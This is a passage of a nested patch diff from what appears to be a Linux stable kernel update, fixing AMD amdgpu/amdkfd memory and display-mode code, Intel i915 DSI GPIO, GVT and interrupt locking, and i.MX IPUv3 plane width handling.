+-			goto fail;
+-	}
+-
+-	if (domain & AMDGPU_GEM_DOMAIN_VRAM) {
++		else if (!man)
++			WARN_ON_ONCE("GTT domain requested but GTT mem manager uninitialized");
++		goto fail;
++	} else if (domain & AMDGPU_GEM_DOMAIN_VRAM) {
+ 		man = ttm_manager_type(&adev->mman.bdev, TTM_PL_VRAM);
+ 
+-		if (size < man->size)
++		if (man && size < man->size)
+ 			return true;
+-		else
+-			goto fail;
++		goto fail;
+ 	}
+ 
+-
+ 	/* TODO add more domains checks, such as AMDGPU_GEM_DOMAIN_CPU */
+ 	return true;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index 951b636772484..dd351105c1bcf 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -689,13 +689,13 @@ void kfd_process_destroy_wq(void)
+ }
+ 
+ static void kfd_process_free_gpuvm(struct kgd_mem *mem,
+-			struct kfd_process_device *pdd, void *kptr)
++			struct kfd_process_device *pdd, void **kptr)
+ {
+ 	struct kfd_dev *dev = pdd->dev;
+ 
+-	if (kptr) {
++	if (kptr && *kptr) {
+ 		amdgpu_amdkfd_gpuvm_unmap_gtt_bo_from_kernel(mem);
+-		kptr = NULL;
++		*kptr = NULL;
+ 	}
+ 
+ 	amdgpu_amdkfd_gpuvm_unmap_memory_from_gpu(dev->adev, mem, pdd->drm_priv);
+@@ -795,7 +795,7 @@ static void kfd_process_device_destroy_ib_mem(struct kfd_process_device *pdd)
+ 	if (!qpd->ib_kaddr || !qpd->ib_base)
+ 		return;
+ 
+-	kfd_process_free_gpuvm(qpd->ib_mem, pdd, qpd->ib_kaddr);
++	kfd_process_free_gpuvm(qpd->ib_mem, pdd, &qpd->ib_kaddr);
+ }
+ 
+ struct kfd_process *kfd_create_process(struct file *filep)
+@@ -1277,7 +1277,7 @@ static void kfd_process_device_destroy_cwsr_dgpu(struct kfd_process_device *pdd)
+ 	if (!dev->cwsr_enabled || !qpd->cwsr_kaddr || !qpd->cwsr_base)
+ 		return;
+ 
+-	kfd_process_free_gpuvm(qpd->cwsr_mem, pdd, qpd->cwsr_kaddr);
++	kfd_process_free_gpuvm(qpd->cwsr_mem, pdd, &qpd->cwsr_kaddr);
+ }
+ 
+ void kfd_process_set_trap_handler(struct qcm_process_device *qpd,
+@@ -1576,9 +1576,9 @@ int kfd_process_device_init_vm(struct kfd_process_device *pdd,
+ 	p = pdd->process;
+ 	dev = pdd->dev;
+ 
+-	ret = amdgpu_amdkfd_gpuvm_acquire_process_vm(
+-		dev->adev, drm_file, p->pasid,
+-		&p->kgd_process_info, &p->ef);
++	ret = amdgpu_amdkfd_gpuvm_acquire_process_vm(dev->adev, drm_file,
++						     &p->kgd_process_info,
++						     &p->ef);
+ 	if (ret) {
+ 		pr_err("Failed to create process VM object\n");
+ 		return ret;
+@@ -1593,13 +1593,19 @@ int kfd_process_device_init_vm(struct kfd_process_device *pdd,
+ 	if (ret)
+ 		goto err_init_cwsr;
+ 
++	ret = amdgpu_amdkfd_gpuvm_set_vm_pasid(dev->adev, drm_file, p->pasid);
++	if (ret)
++		goto err_set_pasid;
++
+ 	pdd->drm_file = drm_file;
+ 
+ 	return 0;
+ 
++err_set_pasid:
++	kfd_process_device_destroy_cwsr_dgpu(pdd);
+ err_init_cwsr:
++	kfd_process_device_destroy_ib_mem(pdd);
+ err_reserve_ib_mem:
+-	kfd_process_device_free_bos(pdd);
+ 	pdd->drm_priv = NULL;
+ 
+ 	return ret;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 3f0a4a415907d..35a9b702508af 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -801,7 +801,7 @@ static int kfd_build_sysfs_node_entry(struct kfd_topology_device *dev,
+ 
+ 		p2plink->attr.name = "properties";
+ 		p2plink->attr.mode = KFD_SYSFS_FILE_MODE;
+-		sysfs_attr_init(&iolink->attr);
++		sysfs_attr_init(&p2plink->attr);
+ 		ret = sysfs_create_file(p2plink->kobj, &p2plink->attr);
+ 		if (ret < 0)
+ 			return ret;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index c2c26fbea5129..dacad8b85963c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4372,6 +4372,10 @@ static int amdgpu_dm_initialize_drm_device(struct amdgpu_device *adev)
+ 		amdgpu_set_panel_orientation(&aconnector->base);
+ 	}
+ 
++	/* If we didn't find a panel, notify the acpi video detection */
++	if (dm->adev->flags & AMD_IS_APU && dm->num_of_edps == 0)
++		acpi_video_report_nolcd();
++
+ 	/* Software is initialized. Now we can register interrupt handlers. */
+ 	switch (adev->asic_type) {
+ #if defined(CONFIG_DRM_AMD_DC_SI)
+@@ -5803,7 +5807,8 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		 */
+ 		DRM_DEBUG_DRIVER("No preferred mode found\n");
+ 	} else {
+-		recalculate_timing = is_freesync_video_mode(&mode, aconnector);
++		recalculate_timing = amdgpu_freesync_vid_mode &&
++				 is_freesync_video_mode(&mode, aconnector);
+ 		if (recalculate_timing) {
+ 			freesync_mode = get_highest_refresh_rate_mode(aconnector, false);
+ 			drm_mode_copy(&saved_mode, &mode);
+@@ -6888,7 +6893,7 @@ static void amdgpu_dm_connector_add_freesync_modes(struct drm_connector *connect
+ 	struct amdgpu_dm_connector *amdgpu_dm_connector =
+ 		to_amdgpu_dm_connector(connector);
+ 
+-	if (!edid)
++	if (!(amdgpu_freesync_vid_mode && edid))
+ 		return;
+ 
+ 	if (amdgpu_dm_connector->max_vfreq - amdgpu_dm_connector->min_vfreq > 10)
+@@ -8749,7 +8754,8 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		 * TODO: Refactor this function to allow this check to work
+ 		 * in all conditions.
+ 		 */
+-		if (dm_new_crtc_state->stream &&
++		if (amdgpu_freesync_vid_mode &&
++		    dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state, old_crtc_state))
+ 			goto skip_modeset;
+ 
+@@ -8784,7 +8790,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		if (!dm_old_crtc_state->stream)
+ 			goto skip_modeset;
+ 
+-		if (dm_new_crtc_state->stream &&
++		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+ 						     old_crtc_state)) {
+ 			new_crtc_state->mode_changed = false;
+@@ -8796,7 +8802,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 			set_freesync_fixed_config(dm_new_crtc_state);
+ 
+ 			goto skip_modeset;
+-		} else if (aconnector &&
++		} else if (amdgpu_freesync_vid_mode && aconnector &&
+ 			   is_freesync_video_mode(&new_crtc_state->mode,
+ 						  aconnector)) {
+ 			struct drm_display_mode *high_mode;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 9afd9ba23fb2a..820042f6aaca5 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -670,6 +670,25 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 		v->cursor_bw[k] = mode_lib->vba.NumberOfCursors[k] * mode_lib->vba.CursorWidth[k][0] * mode_lib->vba.CursorBPP[k][0] / 8 / (mode_lib->vba.HTotal[k] / mode_lib->vba.PixelClock[k]) * mode_lib->vba.VRatio[k];
+ 	}
+ 
++	v->NotEnoughDETSwathFillLatencyHiding = dml32_CalculateDETSwathFillLatencyHiding(
++						mode_lib->vba.NumberOfActiveSurfaces,
++						mode_lib->vba.ReturnBW,
++						v->UrgentLatency,
++						mode_lib->vba.SwathHeightY,
++						mode_lib->vba.SwathHeightC,
++						v->swath_width_luma_ub,
++						v->swath_width_chroma_ub,
++						v->BytePerPixelDETY,
++						v->BytePerPixelDETC,
++						mode_lib->vba.DETBufferSizeY,
++						mode_lib->vba.DETBufferSizeC,
++						mode_lib->vba.DPPPerPlane,
++						mode_lib->vba.HTotal,
++						mode_lib->vba.PixelClock,
++						mode_lib->vba.VRatio,
++						mode_lib->vba.VRatioChroma,
++						mode_lib->vba.UsesMALLForPStateChange);
++
+ 	for (k = 0; k < mode_lib->vba.NumberOfActiveSurfaces; ++k) {
+ 		v->MaxVStartupLines[k] = ((mode_lib->vba.Interlace[k] &&
+ 				!mode_lib->vba.ProgressiveToInterlaceUnitInOPP) ?
+@@ -1664,6 +1683,7 @@ static void mode_support_configuration(struct vba_vars_st *v,
+ 				&& mode_lib->vba.PTEBufferSizeNotExceeded[i][j] == true
+ 				&& mode_lib->vba.DCCMetaBufferSizeNotExceeded[i][j] == true
+ 				&& mode_lib->vba.NonsupportedDSCInputBPC == false
++				&& mode_lib->vba.NotEnoughDETSwathFillLatencyHidingPerState[i][j] == false
+ 				&& !mode_lib->vba.ExceededMALLSize
+ 				&& ((mode_lib->vba.HostVMEnable == false
+ 				&& !mode_lib->vba.ImmediateFlipRequiredFinal)
+@@ -3158,6 +3178,25 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.UrgentBurstFactorChroma,
+ 					mode_lib->vba.UrgentBurstFactorCursor);
+ 
++			mode_lib->vba.NotEnoughDETSwathFillLatencyHidingPerState[i][j] = dml32_CalculateDETSwathFillLatencyHiding(
++					mode_lib->vba.NumberOfActiveSurfaces,
++					mode_lib->vba.ReturnBWPerState[i][j],
++					mode_lib->vba.UrgLatency[i],
++					mode_lib->vba.SwathHeightYThisState,
++					mode_lib->vba.SwathHeightCThisState,
++					mode_lib->vba.swath_width_luma_ub_this_state,
++					mode_lib->vba.swath_width_chroma_ub_this_state,
++					mode_lib->vba.BytePerPixelInDETY,
++					mode_lib->vba.BytePerPixelInDETC,
++					mode_lib->vba.DETBufferSizeYThisState,
++					mode_lib->vba.DETBufferSizeCThisState,
++					mode_lib->vba.NoOfDPPThisState,
++					mode_lib->vba.HTotal,
++					mode_lib->vba.PixelClock,
++					mode_lib->vba.VRatio,
++					mode_lib->vba.VRatioChroma,
++					mode_lib->vba.UsesMALLForPStateChange);
++
+ 			v->dummy_vars.dml32_ModeSupportAndSystemConfigurationFull.VMDataOnlyReturnBWPerState = dml32_get_return_bw_mbps_vm_only(&mode_lib->vba.soc, i,
+ 					mode_lib->vba.DCFCLKState[i][j], mode_lib->vba.FabricClockPerState[i],
+ 					mode_lib->vba.DRAMSpeedPerState[i]);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+index debe46b24a3e1..b53feeaf5cf11 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+@@ -6228,3 +6228,72 @@ void dml32_CalculateImmediateFlipBandwithSupport(unsigned int NumberOfActiveSurf
+ 	*ImmediateFlipBandwidthSupport = (*TotalBandwidth <= ReturnBW);
+ 	*FractionOfUrgentBandwidth = *TotalBandwidth / ReturnBW;
+ }
++
++bool dml32_CalculateDETSwathFillLatencyHiding(unsigned int NumberOfActiveSurfaces,
++		double ReturnBW,
++		double UrgentLatency,
++		unsigned int SwathHeightY[],
++		unsigned int SwathHeightC[],
++		unsigned int SwathWidthY[],
++		unsigned int SwathWidthC[],
++		double  BytePerPixelInDETY[],
++		double  BytePerPixelInDETC[],
++		unsigned int    DETBufferSizeY[],
++		unsigned int    DETBufferSizeC[],
++		unsigned int	NumOfDPP[],
++		unsigned int	HTotal[],
++		double	PixelClock[],
++		double	VRatioY[],
++		double	VRatioC[],
++		enum dm_use_mall_for_pstate_change_mode UsesMALLForPStateChange[DC__NUM_DPP__MAX])
++{
++	int k;
++	double SwathSizeAllSurfaces = 0;
++	double SwathSizeAllSurfacesInFetchTimeUs;
++	double DETSwathLatencyHidingUs;
++	double DETSwathLatencyHidingYUs;
++	double DETSwathLatencyHidingCUs;
++	double SwathSizePerSurfaceY[DC__NUM_DPP__MAX];
++	double SwathSizePerSurfaceC[DC__NUM_DPP__MAX];
++	bool NotEnoughDETSwathFillLatencyHiding = false;
++
++	/* calculate sum of single swath size for all pipes in bytes */
++	for (k = 0; k < NumberOfActiveSurfaces; k++) {
++		SwathSizePerSurfaceY[k] = SwathHeightY[k] * SwathWidthY[k] * BytePerPixelInDETY[k] * NumOfDPP[k];
++
++		if (SwathHeightC[k] != 0)
++			SwathSizePerSurfaceC[k] = SwathHeightC[k] * SwathWidthC[k] * BytePerPixelInDETC[k] * NumOfDPP[k];
++		else
++			SwathSizePerSurfaceC[k] = 0;
++
++		SwathSizeAllSurfaces += SwathSizePerSurfaceY[k] + SwathSizePerSurfaceC[k];
++	}
++
++	SwathSizeAllSurfacesInFetchTimeUs = SwathSizeAllSurfaces / ReturnBW + UrgentLatency;
++
++	/* ensure all DET - 1 swath can hide a fetch for all surfaces */
++	for (k = 0; k < NumberOfActiveSurfaces; k++) {
++		double LineTime = HTotal[k] / PixelClock[k];
++
++		/* only care if surface is not phantom */
++		if (UsesMALLForPStateChange[k] != dm_use_mall_pstate_change_phantom_pipe) {
++			DETSwathLatencyHidingYUs = (dml_floor(DETBufferSizeY[k] / BytePerPixelInDETY[k] / SwathWidthY[k], 1.0) - SwathHeightY[k]) / VRatioY[k] * LineTime;
++
++			if (SwathHeightC[k] != 0) {
++				DETSwathLatencyHidingCUs = (dml_floor(DETBufferSizeC[k] / BytePerPixelInDETC[k] / SwathWidthC[k], 1.0) - SwathHeightC[k]) / VRatioC[k] * LineTime;
++
++				DETSwathLatencyHidingUs = dml_min(DETSwathLatencyHidingYUs, DETSwathLatencyHidingCUs);
++			} else {
++				DETSwathLatencyHidingUs = DETSwathLatencyHidingYUs;
++			}
++
++			/* DET must be able to hide time to fetch 1 swath for each surface */
++			if (DETSwathLatencyHidingUs < SwathSizeAllSurfacesInFetchTimeUs) {
++				NotEnoughDETSwathFillLatencyHiding = true;
++				break;
++			}
++		}
++	}
++
++	return NotEnoughDETSwathFillLatencyHiding;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+index 3989c2a28faec..779c6805f5997 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+@@ -1141,4 +1141,22 @@ void dml32_CalculateImmediateFlipBandwithSupport(unsigned int NumberOfActiveSurf
+ 		double  *FractionOfUrgentBandwidth,
+ 		bool *ImmediateFlipBandwidthSupport);
+ 
++bool dml32_CalculateDETSwathFillLatencyHiding(unsigned int NumberOfActiveSurfaces,
++		double ReturnBW,
++		double UrgentLatency,
++		unsigned int SwathHeightY[],
++		unsigned int SwathHeightC[],
++		unsigned int SwathWidthY[],
++		unsigned int SwathWidthC[],
++		double  BytePerPixelInDETY[],
++		double  BytePerPixelInDETC[],
++		unsigned int    DETBufferSizeY[],
++		unsigned int    DETBufferSizeC[],
++		unsigned int	NumOfDPP[],
++		unsigned int	HTotal[],
++		double	PixelClock[],
++		double	VRatioY[],
++		double	VRatioC[],
++		enum dm_use_mall_for_pstate_change_mode UsesMALLForPStateChange[DC__NUM_DPP__MAX]);
++
+ #endif
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+index a0207a8f87565..2b34b02dbd459 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+@@ -1041,6 +1041,7 @@ struct vba_vars_st {
+ 	double MinFullDETBufferingTime;
+ 	double AverageReadBandwidthGBytePerSecond;
+ 	bool   FirstMainPlane;
++	bool NotEnoughDETSwathFillLatencyHiding;
+ 
+ 	unsigned int ViewportWidthChroma[DC__NUM_DPP__MAX];
+ 	unsigned int ViewportHeightChroma[DC__NUM_DPP__MAX];
+@@ -1224,6 +1225,7 @@ struct vba_vars_st {
+ 	unsigned int BlockWidthC[DC__NUM_DPP__MAX];
+ 	unsigned int SubViewportLinesNeededInMALL[DC__NUM_DPP__MAX];
+ 	bool VActiveBandwithSupport[DC__VOLTAGE_STATES][2];
++	bool NotEnoughDETSwathFillLatencyHidingPerState[DC__VOLTAGE_STATES][2];
+ 	struct dummy_vars dummy_vars;
+ };
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index fce69fa446d58..2cbc1292ab382 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -41,9 +41,11 @@
+ 
+ #include "i915_drv.h"
+ #include "i915_reg.h"
++#include "intel_de.h"
+ #include "intel_display_types.h"
+ #include "intel_dsi.h"
+ #include "intel_dsi_vbt.h"
++#include "intel_gmbus_regs.h"
+ #include "vlv_dsi.h"
+ #include "vlv_dsi_regs.h"
+ #include "vlv_sideband.h"
+@@ -377,6 +379,85 @@ static void icl_exec_gpio(struct intel_connector *connector,
+ 	drm_dbg_kms(&dev_priv->drm, "Skipping ICL GPIO element execution\n");
+ }
+ 
++enum {
++	MIPI_RESET_1 = 0,
++	MIPI_AVDD_EN_1,
++	MIPI_BKLT_EN_1,
++	MIPI_AVEE_EN_1,
++	MIPI_VIO_EN_1,
++	MIPI_RESET_2,
++	MIPI_AVDD_EN_2,
++	MIPI_BKLT_EN_2,
++	MIPI_AVEE_EN_2,
++	MIPI_VIO_EN_2,
++};
++
++static void icl_native_gpio_set_value(struct drm_i915_private *dev_priv,
++				      int gpio, bool value)
++{
++	int index;
++
++	if (drm_WARN_ON(&dev_priv->drm, DISPLAY_VER(dev_priv) == 11 && gpio >= MIPI_RESET_2))
++		return;
++
++	switch (gpio) {
++	case MIPI_RESET_1:
++	case MIPI_RESET_2:
++		index = gpio == MIPI_RESET_1 ? HPD_PORT_A : HPD_PORT_B;
++
++		/*
++		 * Disable HPD to set the pin to output, and set output
++		 * value. The HPD pin should not be enabled for DSI anyway,
++		 * assuming the board design and VBT are sane, and the pin isn't
++		 * used by a non-DSI encoder.
++		 *
++		 * The locking protects against concurrent SHOTPLUG_CTL_DDI
++		 * modifications in irq setup and handling.
++		 */
++		spin_lock_irq(&dev_priv->irq_lock);
++		intel_de_rmw(dev_priv, SHOTPLUG_CTL_DDI,
++			     SHOTPLUG_CTL_DDI_HPD_ENABLE(index) |
++			     SHOTPLUG_CTL_DDI_HPD_OUTPUT_DATA(index),
++			     value ? SHOTPLUG_CTL_DDI_HPD_OUTPUT_DATA(index) : 0);
++		spin_unlock_irq(&dev_priv->irq_lock);
++		break;
++	case MIPI_AVDD_EN_1:
++	case MIPI_AVDD_EN_2:
++		index = gpio == MIPI_AVDD_EN_1 ? 0 : 1;
++
++		intel_de_rmw(dev_priv, PP_CONTROL(index), PANEL_POWER_ON,
++			     value ? PANEL_POWER_ON : 0);
++		break;
++	case MIPI_BKLT_EN_1:
++	case MIPI_BKLT_EN_2:
++		index = gpio == MIPI_BKLT_EN_1 ? 0 : 1;
++
++		intel_de_rmw(dev_priv, PP_CONTROL(index), EDP_BLC_ENABLE,
++			     value ? EDP_BLC_ENABLE : 0);
++		break;
++	case MIPI_AVEE_EN_1:
++	case MIPI_AVEE_EN_2:
++		index = gpio == MIPI_AVEE_EN_1 ? 1 : 2;
++
++		intel_de_rmw(dev_priv, GPIO(dev_priv, index),
++			     GPIO_CLOCK_VAL_OUT,
++			     GPIO_CLOCK_DIR_MASK | GPIO_CLOCK_DIR_OUT |
++			     GPIO_CLOCK_VAL_MASK | (value ? GPIO_CLOCK_VAL_OUT : 0));
++		break;
++	case MIPI_VIO_EN_1:
++	case MIPI_VIO_EN_2:
++		index = gpio == MIPI_VIO_EN_1 ? 1 : 2;
++
++		intel_de_rmw(dev_priv, GPIO(dev_priv, index),
++			     GPIO_DATA_VAL_OUT,
++			     GPIO_DATA_DIR_MASK | GPIO_DATA_DIR_OUT |
++			     GPIO_DATA_VAL_MASK | (value ? GPIO_DATA_VAL_OUT : 0));
++		break;
++	default:
++		MISSING_CASE(gpio);
++	}
++}
++
+ static const u8 *mipi_exec_gpio(struct intel_dsi *intel_dsi, const u8 *data)
+ {
+ 	struct drm_device *dev = intel_dsi->base.base.dev;
+@@ -384,8 +465,7 @@ static const u8 *mipi_exec_gpio(struct intel_dsi *intel_dsi, const u8 *data)
+ 	struct intel_connector *connector = intel_dsi->attached_connector;
+ 	u8 gpio_source, gpio_index = 0, gpio_number;
+ 	bool value;
+-
+-	drm_dbg_kms(&dev_priv->drm, "\n");
++	bool native = DISPLAY_VER(dev_priv) >= 11;
+ 
+ 	if (connector->panel.vbt.dsi.seq_version >= 3)
+ 		gpio_index = *data++;
+@@ -398,10 +478,18 @@ static const u8 *mipi_exec_gpio(struct intel_dsi *intel_dsi, const u8 *data)
+ 	else
+ 		gpio_source = 0;
+ 
++	if (connector->panel.vbt.dsi.seq_version >= 4 && *data & BIT(1))
++		native = false;
++
+ 	/* pull up/down */
+ 	value = *data++ & 1;
+ 
+-	if (DISPLAY_VER(dev_priv) >= 11)
++	drm_dbg_kms(&dev_priv->drm, "GPIO index %u, number %u, source %u, native %s, set to %s\n",
++		    gpio_index, gpio_number, gpio_source, str_yes_no(native), str_on_off(value));
++
++	if (native)
++		icl_native_gpio_set_value(dev_priv, gpio_number, value);
++	else if (DISPLAY_VER(dev_priv) >= 11)
+ 		icl_exec_gpio(connector, gpio_source, gpio_index, value);
+ 	else if (IS_VALLEYVIEW(dev_priv))
+ 		vlv_exec_gpio(connector, gpio_source, gpio_number, value);
+diff --git a/drivers/gpu/drm/i915/gvt/debugfs.c b/drivers/gpu/drm/i915/gvt/debugfs.c
+index 9f1c209d92511..e08ed0e9f1653 100644
+--- a/drivers/gpu/drm/i915/gvt/debugfs.c
++++ b/drivers/gpu/drm/i915/gvt/debugfs.c
+@@ -175,8 +175,13 @@ void intel_gvt_debugfs_add_vgpu(struct intel_vgpu *vgpu)
+  */
+ void intel_gvt_debugfs_remove_vgpu(struct intel_vgpu *vgpu)
+ {
+-	debugfs_remove_recursive(vgpu->debugfs);
+-	vgpu->debugfs = NULL;
++	struct intel_gvt *gvt = vgpu->gvt;
++	struct drm_minor *minor = gvt->gt->i915->drm.primary;
++
++	if (minor->debugfs_root && gvt->debugfs_root) {
++		debugfs_remove_recursive(vgpu->debugfs);
++		vgpu->debugfs = NULL;
++	}
+ }
+ 
+ /**
+@@ -199,6 +204,10 @@ void intel_gvt_debugfs_init(struct intel_gvt *gvt)
+  */
+ void intel_gvt_debugfs_clean(struct intel_gvt *gvt)
+ {
+-	debugfs_remove_recursive(gvt->debugfs_root);
+-	gvt->debugfs_root = NULL;
++	struct drm_minor *minor = gvt->gt->i915->drm.primary;
++
++	if (minor->debugfs_root) {
++		debugfs_remove_recursive(gvt->debugfs_root);
++		gvt->debugfs_root = NULL;
++	}
+ }
+diff --git a/drivers/gpu/drm/i915/gvt/gtt.c b/drivers/gpu/drm/i915/gvt/gtt.c
+index ce0eb03709c3f..80c60754a5c1c 100644
+--- a/drivers/gpu/drm/i915/gvt/gtt.c
++++ b/drivers/gpu/drm/i915/gvt/gtt.c
+@@ -1214,10 +1214,8 @@ static int split_2MB_gtt_entry(struct intel_vgpu *vgpu,
+ 	for_each_shadow_entry(sub_spt, &sub_se, sub_index) {
+ 		ret = intel_gvt_dma_map_guest_page(vgpu, start_gfn + sub_index,
+ 						   PAGE_SIZE, &dma_addr);
+-		if (ret) {
+-			ppgtt_invalidate_spt(spt);
+-			return ret;
+-		}
++		if (ret)
++			goto err;
+ 		sub_se.val64 = se->val64;
+ 
+ 		/* Copy the PAT field from PDE. */
+@@ -1236,6 +1234,17 @@ static int split_2MB_gtt_entry(struct intel_vgpu *vgpu,
+ 	ops->set_pfn(se, sub_spt->shadow_page.mfn);
+ 	ppgtt_set_shadow_entry(spt, se, index);
+ 	return 0;
++err:
++	/* Cancel the existing addess mappings of DMA addr. */
++	for_each_present_shadow_entry(sub_spt, &sub_se, sub_index) {
++		gvt_vdbg_mm("invalidate 4K entry\n");
++		ppgtt_invalidate_pte(sub_spt, &sub_se);
++	}
++	/* Release the new allocated spt. */
++	trace_spt_change(sub_spt->vgpu->id, "release", sub_spt,
++		sub_spt->guest_page.gfn, sub_spt->shadow_page.type);
++	ppgtt_free_spt(sub_spt);
++	return ret;
+ }
+ 
+ static int split_64KB_gtt_entry(struct intel_vgpu *vgpu,
+diff --git a/drivers/gpu/drm/i915/gvt/scheduler.c b/drivers/gpu/drm/i915/gvt/scheduler.c
+index d6fe94cd0fdb6..8342d95f56cbc 100644
+--- a/drivers/gpu/drm/i915/gvt/scheduler.c
++++ b/drivers/gpu/drm/i915/gvt/scheduler.c
+@@ -696,6 +696,7 @@ intel_vgpu_shadow_mm_pin(struct intel_vgpu_workload *workload)
+ 
+ 	if (workload->shadow_mm->type != INTEL_GVT_MM_PPGTT ||
+ 	    !workload->shadow_mm->ppgtt_mm.shadowed) {
++		intel_vgpu_unpin_mm(workload->shadow_mm);
+ 		gvt_vgpu_err("workload shadow ppgtt isn't ready\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/gpu/drm/i915/i915_irq.c b/drivers/gpu/drm/i915/i915_irq.c
+index 86a42d9e80412..f93ffa6626a57 100644
+--- a/drivers/gpu/drm/i915/i915_irq.c
++++ b/drivers/gpu/drm/i915/i915_irq.c
+@@ -1981,8 +1981,11 @@ static void icp_irq_handler(struct drm_i915_private *dev_priv, u32 pch_iir)
+ 	if (ddi_hotplug_trigger) {
+ 		u32 dig_hotplug_reg;
+ 
++		/* Locking due to DSI native GPIO sequences */
++		spin_lock(&dev_priv->irq_lock);
+ 		dig_hotplug_reg = intel_uncore_read(&dev_priv->uncore, SHOTPLUG_CTL_DDI);
+ 		intel_uncore_write(&dev_priv->uncore, SHOTPLUG_CTL_DDI, dig_hotplug_reg);
++		spin_unlock(&dev_priv->irq_lock);
+ 
+ 		intel_get_hpd_pins(dev_priv, &pin_mask, &long_mask,
+ 				   ddi_hotplug_trigger, dig_hotplug_reg,
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index da35bb2db26b6..64eacd11b8bff 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -6035,6 +6035,7 @@
+ 
+ #define SHOTPLUG_CTL_DDI				_MMIO(0xc4030)
+ #define   SHOTPLUG_CTL_DDI_HPD_ENABLE(hpd_pin)			(0x8 << (_HPD_PIN_DDI(hpd_pin) * 4))
++#define   SHOTPLUG_CTL_DDI_HPD_OUTPUT_DATA(hpd_pin)		(0x4 << (_HPD_PIN_DDI(hpd_pin) * 4))
+ #define   SHOTPLUG_CTL_DDI_HPD_STATUS_MASK(hpd_pin)		(0x3 << (_HPD_PIN_DDI(hpd_pin) * 4))
+ #define   SHOTPLUG_CTL_DDI_HPD_NO_DETECT(hpd_pin)		(0x0 << (_HPD_PIN_DDI(hpd_pin) * 4))
+ #define   SHOTPLUG_CTL_DDI_HPD_SHORT_DETECT(hpd_pin)		(0x1 << (_HPD_PIN_DDI(hpd_pin) * 4))
+diff --git a/drivers/gpu/drm/imx/ipuv3-plane.c b/drivers/gpu/drm/imx/ipuv3-plane.c
+index dba4f7d81d693..80142d9a4a552 100644
+--- a/drivers/gpu/drm/imx/ipuv3-plane.c
++++ b/drivers/gpu/drm/imx/ipuv3-plane.c
+@@ -614,6 +614,11 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 		break;
+ 	}
+ 
++	if (ipu_plane->dp_flow == IPU_DP_FLOW_SYNC_BG)
++		width = ipu_src_rect_width(new_state);
++	else
++		width = drm_rect_width(&new_state->src) >> 16;
++
+ 	eba = drm_plane_state_to_eba(new_state, 0);
+ 
+ 	/*
+@@ -622,8 +627,7 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 	 */
+ 	if (ipu_state->use_pre) {
+ 		axi_id = ipu_chan_assign_axi_id(ipu_plane->dma);
+-		ipu_prg_channel_configure(ipu_plane->ipu_ch, axi_id,
+-					  ipu_src_rect_width(new_state),
++		ipu_prg_channel_configure(ipu_plane->ipu_ch, axi_id, width,
+ 					  drm_rect_height(&new_state->src) >> 16,
+ 					  fb->pitches[0], fb->format->format,
+ 					  fb->modifier, &eba);
+@@ -678,9 +682,8 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 		break;
+ 	}
+ 
+-	ipu_dmfc_config_wait4eot(ipu_plane->dmfc, ALIGN(drm_rect_width(dst), 8));
++	ipu_dmfc_config_wait4eot(ipu_plane->dmfc, width);
+ 
